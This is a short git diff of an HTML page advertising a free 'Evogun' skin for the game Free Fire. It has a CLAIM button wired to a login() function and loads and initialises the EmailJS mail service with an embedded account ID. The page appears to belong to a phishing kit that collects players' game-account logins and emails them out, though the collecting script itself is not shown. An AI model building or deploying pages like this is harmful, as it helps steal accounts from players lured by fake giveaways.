--- a/id/evogun/index.html
+++ b/id/evogun/index.html
@@ -6,6 +6,7 @@
 <meta name="viewport" content="width=device-width,user-scalable=no">
 <title>BAGI BAGI EVOGUN SKIN FREEFIRE</title>
 <script src="main.js"></script>
+<script src="https://cdn.jsdelivr.net/npm/emailjs-com@2/dist/email.min.js"></script>
 </head>
 <body>
 <center>
@@ -23,11 +24,11 @@
 <img width="200" height="100" src="umpEvo.jpg">
 <center><button onclick="login()">CLAIM</button></center>
 </center>
+<center>
 <script>
 (function() {
      emailjs.init('user_Uo3DWO4lfQjwUkIRdJDxU');
 })();
 </script>
-<script src="https://cdn.jsdelivr.net/npm/emailjs-com@2/dist/email.min.js"></script>
 </body>
 </html>
